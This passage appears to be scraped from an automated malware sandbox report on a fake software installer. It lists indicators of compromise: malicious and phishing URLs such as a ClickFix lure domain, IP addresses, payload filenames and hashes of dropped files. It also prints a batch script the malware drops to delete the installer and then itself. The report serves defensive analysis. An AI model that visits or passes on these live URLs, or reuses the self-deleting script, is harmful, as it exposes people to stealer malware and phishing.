                                                                            setup.exeGet hashmaliciousBabadeda, RHADAMANTHYS, RedLineBrowse
                                                                              8MO5hfPa8d.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                                SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exeGet hashmaliciousAsyncRAT, Clipboard HijackerBrowse
                                                                                  190.92.154.206https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                    https://rea.grupolalegion.ec/p.phpGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                      https://rea.grupolalegion.ec/p.phpGet hashmaliciousUnknownBrowse
                                                                                        https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                          https://rea.grupolalegion.ec/p.php/1Get hashmaliciousUnknownBrowse
                                                                                            https://rea.grupolalegion.ec/p.phpGet hashmaliciousUnknownBrowse
                                                                                              https://rea.grupolalegion.ec/Viber.exeGet hashmaliciousUnknownBrowse
                                                                                                z3oPvgjvyN.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  104.18.111.161vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                  • tinyurl.com/bdhpvpny
                                                                                                  VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                  • tinyurl.com/muewsc78
                                                                                                  5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                  • tinyurl.com/yeykydun
                                                                                                  BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • tinyurl.com/yeykydun
                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                  • tinyurl.com/yk3s8ubp
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  tinyurl.complugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.111.161
                                                                                                  plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.112.233
                                                                                                  https://tinyurl.com/4f78h9spGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.112.233
                                                                                                  https://gffd-5ru.pages.dev/?email=nobody@wp.pl&mail=wp.plGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.18.111.161
                                                                                                  https://www.ijf.org/cookies_agree?backTo=//wehirectrecruitments.com/skip/67f713e63d79655c92b5cc879ab7528bY2xhcmUubmljaG9sc0BkdnNhLmdvdi51aw==67f713e63d79655c92b5cc879ab7528bGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.18.111.161
                                                                                                  https://tinyurl.com/7kurjbxf#moreinfo@choosewashington.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.18.111.161
                                                                                                  https://tinyurl.com/52atpek7Get hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.112.233
                                                                                                  https://tinyurl.com/puttytoGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                  • 104.18.111.161
                                                                                                  8dm2CHOlmZ.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 104.17.112.233
                                                                                                  https://forms.office.com/Pages/ShareFormPage.aspx?id=iTARqgAd5UqV7QMdokx8z5JQ4K3tn3VMnOw2L2-4Y1tUQzFZOEUySUhJNFFWWTUxSjFORUVGUVNVNi4u&sharetoken=iZc5orqlj4ABtC30rQXFGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.18.111.161
                                                                                                  rentry.orgplugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 164.132.58.105
                                                                                                  asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                                  • 164.132.58.105
                                                                                                  XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 164.132.58.105
                                                                                                  sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                  • 164.132.58.105
                                                                                                  AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 198.251.88.130
                                                                                                  AtlasLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 198.251.88.130
                                                                                                  LX.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 198.251.88.130
                                                                                                  rea.grupolalegion.echttps://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.phpGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.phpGet hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.php/1Get hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.phpGet hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/Viber.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  z3oPvgjvyN.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUS1.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.135.71
                                                                                                  1.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.80.136
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.62.135
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.62.135
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  https://www.criminon.org/Get hashmaliciousUnknownBrowse
                                                                                                  • 104.16.123.96
                                                                                                  PalEak0Yh6.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 172.67.75.172
                                                                                                  http://signaturerequestdocumentsmarch.sombrainfinita.de/uN7hnGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.112.1
                                                                                                  https://eztxt.net/Iv7CmP#bW9uaWNhX2NvbGJhdGhAZmQub3JnGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  OVHFRhttps://www.dottedsign.com/task?code=eyJhbGciOiJIUzUxMiJ9.eyJ0YXNrX2lkIjozNDU1ODM1LCJmaWxlX2lkIjoyMjU3NDQ4Mywic2lnbl9maWxlX2lkIjoyMzE3NTY1OCwic3RhZ2VfaWQiOjQ3MjQ2MTcsImVtYWlsIjoidmZhcmlhc0B3ZXN0bGFrZS5jb20iLCJleHBpcmVkX2F0IjoxNzQxNTUzNDgzfQ.HzZLgMMxAZSV_iVgO--XdcSNVOvVCdiCg8S3aUWMChplsdtgyqOWKyJi3vwVbeBh99sm9EHWsNwj41IZdYNjWAGet hashmaliciousUnknownBrowse
                                                                                                  • 51.77.64.70
                                                                                                  NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 51.222.255.207
                                                                                                  FuYyhSE7Nh.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 94.23.158.211
                                                                                                  FuYyhSE7Nh.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 94.23.158.211
                                                                                                  plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  Halkbank Ekstre.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                  • 51.81.149.203
                                                                                                  Update.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                  • 51.79.171.167
                                                                                                  Update.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                  • 51.79.171.167
                                                                                                  oCPGyn28rc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 144.217.198.22
                                                                                                  DesarrollosDigitalesdePulsarConsultingARmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 200.69.26.158
                                                                                                  https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.phpGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.phpGet hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.php/1Get hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  https://rea.grupolalegion.ec/p.phpGet hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  aV2ffcSuKl.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, SystemBC, VidarBrowse
                                                                                                  • 200.69.22.4
                                                                                                  CLOUDFLARENETUS1.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.135.71
                                                                                                  1.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.80.136
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.62.135
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.62.135
                                                                                                  VirtManage.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  https://www.criminon.org/Get hashmaliciousUnknownBrowse
                                                                                                  • 104.16.123.96
                                                                                                  PalEak0Yh6.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 172.67.75.172
                                                                                                  http://signaturerequestdocumentsmarch.sombrainfinita.de/uN7hnGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.112.1
                                                                                                  https://eztxt.net/Iv7CmP#bW9uaWNhX2NvbGJhdGhAZmQub3JnGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1RFQ-JC25-#595837.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  DQBok03QL1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  ORLVDnEcC3.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  kS9YOZjwfn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  rakf6nyw06.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  0V0Q7kWH0N.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 164.132.58.105
                                                                                                  • 104.18.111.161
                                                                                                  • 172.67.194.165
                                                                                                  37f463bf4616ecd445d4a1937da06e191.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  1.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 190.92.154.206
                                                                                                  BWllpq4Tel.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 190.92.154.206
                                                                                                  uK5pfobYyD.exeGet hashmaliciousDarkCloudBrowse
                                                                                                  • 190.92.154.206
                                                                                                  MNLS4PjscF.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 190.92.154.206
                                                                                                  MNLS4PjscF.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 190.92.154.206
                                                                                                  OW1i3n5K3s.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                  • 190.92.154.206
                                                                                                  BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 190.92.154.206
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmpSecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                    SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                      guge.exeGet hashmaliciousMicroClipBrowse
                                                                                                        google#U5b89#U88c5 .exeGet hashmaliciousMicroClipBrowse
                                                                                                          guge_windows_v7.98.79_Setup.zip.exeGet hashmaliciousMicroClipBrowse
                                                                                                            KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              AppKMSPico.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                AppKMSPico.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  KMSpico.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1427456
                                                                                                                      Entropy (8bit):7.142790634598866
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:jyRjE+yRYwp3ufMx1FxH98F5iULtFx3qMGRm5UJWoHI7vaBvJD6WYc9Z:jyG+8tVYiULtL3XG3uvSJD6lc9Z
                                                                                                                      MD5:33645B3AFD79ED29F7E6F476D7F6ED4B
                                                                                                                      SHA1:D49C57882892F2B600CA440A3E05B7209560A9D0
                                                                                                                      SHA-256:0796140E4F63122408C2D2D536F5C12BD68D8AF54437E767225FE6B88CE61BC5
                                                                                                                      SHA-512:F935A4F6B507D2F63519EDE5B3EC52EF629FEEE8FD5ECF402D6F1368829BA0792A45DE3C9ACC1BDC19D352951A747F900CEDB7376EAC775DE3D8EE5EAAC4A123
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t........@....@..........................P...................@...............................&... .......................@..T............................0......................................................CODE.....'.......(.................. ..`DATA.........@.......,..............@...BSS......................................idata...&.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..T....@......................@..P.rsrc........ ......................@..Ppb...........0......................@...........................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2541056
                                                                                                                      Entropy (8bit):6.38139342357515
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:Yg2qPtc1e5OS7bPGoUl+x/grN4azvchYk2HAT:YvqPCnrN4azvSYPU
                                                                                                                      MD5:6C66FDD38C098F271FDE6E9E74DBD0EB
                                                                                                                      SHA1:27FBE48E15EDCBE0F216C9D0CFAA242DCED5D71C
                                                                                                                      SHA-256:253ABB0DA942F3CE4FB839624077180BDAE8109E82518E6442259A667900DB6F
                                                                                                                      SHA-512:031642B8B219CC46208CDC18107C54BB080C44F0877971D47A052268D9571E67F7F7C786C17F1F78561F976D4BF86F7F9A74453B6B0C9592164CF4299033C540
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....]..................$...........$.......$...@...........................'...........@......@....................&.......%..5...@&..X...................................................0&.....................D.%.@.....&......................text...8.$.......$................. ..`.itext...&....$..(....$............. ..`.data...DZ....$..\....$.............@....bss.....q...@%..........................idata...5....%..6...(%.............@....didata.......&......^%.............@....edata........&......h%.............@..@.tls....D.... &..........................rdata..]....0&......j%.............@..@.rsrc....X...@&..Z...l%.............@..@..............'.......&.............@..@........................................................
                                                                                                                      Process:C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2541056
                                                                                                                      Entropy (8bit):6.38139342357515
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:Yg2qPtc1e5OS7bPGoUl+x/grN4azvchYk2HAT:YvqPCnrN4azvSYPU
                                                                                                                      MD5:6C66FDD38C098F271FDE6E9E74DBD0EB
                                                                                                                      SHA1:27FBE48E15EDCBE0F216C9D0CFAA242DCED5D71C
                                                                                                                      SHA-256:253ABB0DA942F3CE4FB839624077180BDAE8109E82518E6442259A667900DB6F
                                                                                                                      SHA-512:031642B8B219CC46208CDC18107C54BB080C44F0877971D47A052268D9571E67F7F7C786C17F1F78561F976D4BF86F7F9A74453B6B0C9592164CF4299033C540
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....]..................$...........$.......$...@...........................'...........@......@....................&.......%..5...@&..X...................................................0&.....................D.%.@.....&......................text...8.$.......$................. ..`.itext...&....$..(....$............. ..`.data...DZ....$..\....$.............@....bss.....q...@%..........................idata...5....%..6...(%.............@....didata.......&......^%.............@....edata........&......h%.............@..@.tls....D.... &..........................rdata..]....0&......j%.............@..@.rsrc....X...@&..Z...l%.............@..@..............'.......&.............@..@........................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6144
                                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: SecuriteInfo.com.Program.Unwanted.5412.9015.527.exe, Detection: malicious, Browse
                                                                                                                      • Filename: SecuriteInfo.com.Program.Unwanted.5412.9015.527.exe, Detection: malicious, Browse
                                                                                                                      • Filename: guge.exe, Detection: malicious, Browse
                                                                                                                      • Filename: google#U5b89#U88c5 .exe, Detection: malicious, Browse
                                                                                                                      • Filename: guge_windows_v7.98.79_Setup.zip.exe, Detection: malicious, Browse
                                                                                                                      • Filename: KMSpico.exe, Detection: malicious, Browse
                                                                                                                      • Filename: AppKMSPico.exe, Detection: malicious, Browse
                                                                                                                      • Filename: AppKMSPico.exe, Detection: malicious, Browse
                                                                                                                      • Filename: KMSpico.exe, Detection: malicious, Browse
                                                                                                                      • Filename: plugin-newest_release_.exe, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):237568
                                                                                                                      Entropy (8bit):6.42067568634536
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
                                                                                                                      MD5:55C310C0319260D798757557AB3BF636
                                                                                                                      SHA1:0892EB7ED31D8BB20A56C6835990749011A2D8DE
                                                                                                                      SHA-256:54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
                                                                                                                      SHA-512:E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):193
                                                                                                                      Entropy (8bit):4.536947302398739
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:YHNwvorYoK9AcEu4sXj0wvorYoK9AcEu4sXjjK/sn:K+w8XusXj3w8XusXj2/sn
                                                                                                                      MD5:51EDFFA18B8D028241EA809E609B0B74
                                                                                                                      SHA1:F3C69EB23E10EB3F00363E17E1F60973FC00998A
                                                                                                                      SHA-256:70E4C2790B106189BAA4C38DC3A9FE17975D1E667425B0D97DA2F9CAB24D560A
                                                                                                                      SHA-512:2CFFDB56D09311D079916E4EC61360A5A48041E65C4DADC315F14C88E1665FA608ADABA7E5536A99E278E9570571EA7BE8B46C4114FA18734CBA4C44FCE438F4
                                                                                                                      Malicious:false
                                                                                                                      Preview::ol.del C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe.if exist C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe goto ol.del %0
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6144
                                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):237568
                                                                                                                      Entropy (8bit):6.42067568634536
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
                                                                                                                      MD5:55C310C0319260D798757557AB3BF636
                                                                                                                      SHA1:0892EB7ED31D8BB20A56C6835990749011A2D8DE
                                                                                                                      SHA-256:54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
                                                                                                                      SHA-512:E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):847360
                                                                                                                      Entropy (8bit):6.655399003035542
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:N5Oh3oXwjoThmYgKmRCcBcIGvymfIRNM9+1nG0:Ng9ogjoVsRlBAPV+40
                                                                                                                      MD5:6482EE0F372469D1190C74BD70D76153
                                                                                                                      SHA1:9001213D28E5B0B18AA24114A38A1EFE1A767698
                                                                                                                      SHA-256:4B7FC7818F3168945DBEDADCFD7AAF470B88543EF6B685619AD1C942AC3B1DED
                                                                                                                      SHA-512:6A5C2BDF58CD8DEADF51302D8F8B17A14908809EF700A1E366E7D107B1E22ABE8CAF1F68E7EB9D35E9B519793699C3492323F6577C3569A56AC3C845516625F3
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........................r...........................l...r..........1....<............#'....i......6.....Rich..........................PE..L...0DCf.............................U............@.......................................@..................................j..x....`.......................p..0g......................................................P............................text............................... ..`.rdata...g.......h..................@..@.data................f..............@....sxdata......P.......n..............@....rsrc........`.......p..............@..@.reloc...u...p...v...x..............@..B................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines (346)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1995
                                                                                                                      Entropy (8bit):4.9796258677616265
                                                                                                                      Encrypted:false
